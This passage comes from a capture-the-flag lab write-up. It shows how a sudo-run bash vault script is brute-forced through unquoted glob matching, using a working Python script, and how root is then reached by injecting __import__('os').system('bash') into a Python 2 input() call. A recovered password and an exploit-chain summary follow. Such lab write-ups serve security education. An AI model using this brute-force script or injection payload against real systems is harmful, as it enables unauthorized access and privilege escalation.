$ user_input="pab*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
10
FALSE
11
...

We can automate this process with a Python script that loops through all characters prepended to * and checks if the output from the script includes Password matched!. If it does, we know we have discovered a character from the beginning of the password and can move on to the next character.

alt text

1
hansolo@contrabando:~$ nano password_find.py
2
hansolo@contrabando:~$ cat password_find.py
3
import subprocess
4
import string
5

6
charset = string.ascii_letters + string.digits
7
password = ""
8

9
while True:
10
    found = False
11
    for char in charset:
12
        attempt = password + char + "*"
13
        print(f"\r[+] Password: {password+char}", end="")
14
        proc = subprocess.Popen(
15
            ["sudo", "/usr/bin/bash", "/usr/bin/vault"],
16
            stdin=subprocess.PIPE,
17
            stdout=subprocess.PIPE,
18
            stderr=subprocess.PIPE,
19
            text=True
20
        )
21
        stdout, stderr = proc.communicate(input=attempt + "\n")
22
        if "Password matched!" in stdout:
23
            password += char
24
            found = True
25
            break
26
    if not found:
27
        break
28

29
print(f"\r[+] Final Password: {password}")
30
hansolo@contrabando:~$

script

1
# password_find.py
2
import subprocess
3
import string
4

5
charset = string.ascii_letters + string.digits
6
password = ""
7

8
while True:
9
    found = False
10
    for char in charset:
11
        attempt = password + char + "*"
12
        print(f"\r[+] Password: {password+char}", end="")
13
        proc = subprocess.Popen(
14
            ["sudo", "/usr/bin/bash", "/usr/bin/vault"],
15
            stdin=subprocess.PIPE,
16
            stdout=subprocess.PIPE,
17
            stderr=subprocess.PIPE,
18
            text=True
19
        )
20
        stdout, stderr = proc.communicate(input=attempt + "\n")
21
        if "Password matched!" in stdout:
22
            password += char
23
            found = True
24
            break
25
    if not found:
26
        break
27

28
print(f"\r[+] Final Password: {password}")

1
hansolo@contrabando:~$ python3 password_find.py
2
[+] Final Password: EQu5ehwHcRfZ
3
hansolo@contrabando:~$

we have a password : EQu5ehwHcRfZ

NOTE

Checking the /opt/generator/app.py script, it is a simple password generator:

1
hansolo@contrabando:~$ cat /opt/generator/app.py
2
import random
3
import string
4

5
def generate_password(length):
6
    characters = string.ascii_letters + string.digits + string.punctuation
7
    random.seed()
8
    secret = input("Any words you want to add to the password? ")
9
    password_characters = list(characters + secret)
10
    random.shuffle(password_characters)
11
    password = ''.join(password_characters[:length])
12

13
    return password
14

15
try:
16
    length = int(raw_input("Enter the desired length of the password: "))
17
except NameError:
18
    length = int(input("Enter the desired length of the password: "))
19
except ValueError:
20
    print("Invalid input. Using default length of 12.")
21
    length = 12
22

23
password = generate_password(length)
24
print("Generated Password:", password)
25
hansolo@contrabando:~$

1
import random
2
import string
3

4
def generate_password(length):
5
    characters = string.ascii_letters + string.digits + string.punctuation
6
    random.seed()
7
    secret = input("Any words you want to add to the password? ")
8
    password_characters = list(characters + secret)
9
    random.shuffle(password_characters)
10
    password = ''.join(password_characters[:length])
11

12
    return password
13

14
try:
15
    length = int(raw_input("Enter the desired length of the password: "))
16
except NameError:
17
    length = int(input("Enter the desired length of the password: "))
18
except ValueError:
19
    print("Invalid input. Using default length of 12.")
20
    length = 12
21

22
password = generate_password(length)
23
print("Generated Password:", password)

Analysis of the sudo configuration shows that the command can be executed with /usr/bin/python*. Upon inspecting the system, it is confirmed that Python 2 is available as one of the matching binaries, providing an additional execution vector.

alt text

1
hansolo@contrabando:~$ ls -la /usr/bin/python*
2
lrwxrwxrwx 1 root root       9 Mar 13  2020 /usr/bin/python2 -> python2.7
3
-rwxr-xr-x 1 root root 3657904 Dec  9  2024 /usr/bin/python2.7
4
lrwxrwxrwx 1 root root       9 Mar 13  2020 /usr/bin/python3 -> python3.8
5
-rwxr-xr-x 1 root root 5490456 Mar 18 20:04 /usr/bin/python3.8
6
lrwxrwxrwx 1 root root      33 Mar 18 20:04 /usr/bin/python3.8-config -> x86_64-linux-gnu-python3.8-config
7
lrwxrwxrwx 1 root root      16 Mar 13  2020 /usr/bin/python3-config -> python3.8-config
8
hansolo@contrabando:~$

Python2 being available makes this line in the generate_password function problematic:

1
secret = input("Any words you want to add to the password? ")

1
$ python2
2
Python 2.7.18 (default, Aug  1 2022, 06:23:55)
3
[GCC 12.1.0] on linux2
4
Type "help", "copyright", "credits" or "license" for more information.
5

6
>>> print(raw_input("input: "))
7
input: __import__("os").system("whoami")
8
__import__("os").system("whoami")
9

10
>>> print(input("input: "))
11
input: __import__("os").system("whoami")
12
kali
13
0

By executing the sudo-enabled script with Python 2 and submitting the payload

1
__import__("os").system("bash")

alt text

1
hansolo@contrabando:~$ sudo /usr/bin/python2 /opt/generator/app.py
2
[sudo] password for hansolo:
3
Enter the desired length of the password: 1'^H
4
Any words you want to add to the password? __import__("os").system("bash")
5
root@contrabando:/home/hansolo# ls
6
app  hansolo_userflag.txt  password_find.py
7
root@contrabando:/home/hansolo# cd /root
8
root@contrabando:~# ls
9
password  root.txt  secrets  smug  snap
10
root@contrabando:~# cat root.txt
11
THM{All_AbouT_xxxxxxx}
12
root@contrabando:~#

Exploitation Summary#

The Contrabando challenge was systematically exploited as follows:

1. HTTP Request Smuggling (CRLF Injection) – An Apache2 front-end proxy was vulnerable to CRLF injection, allowing us to smuggle a crafted request to the back-end server. This enabled the exploitation of a command injection vulnerability on the back-end, providing an initial shell inside a Docker container.
1. Internal Network Enumeration & SSRF – Within the container, network enumeration revealed an internal web service exposing a Server-Side Request Forgery (SSRF) vulnerability. This was leveraged to access and analyze the application’s source code.
1. Server-Side Template Injection (SSTI) – Combining the SSRF with a Jinja2 SSTI vulnerability in the application allowed execution of arbitrary template code, granting a shell on the host system.
1. Password Recovery & Privilege Escalation – An unquoted Bash script parameter, combined with glob matching, was used to brute-force the hansolo user password. With the password, the sudo-enabled Python2 script was exploited for Remote Code Execution (RCE), escalating privileges to root.
1. This chain of vulnerabilities—from request smuggling to RCE—ultimately allowed full compromise of the host and completion of the room.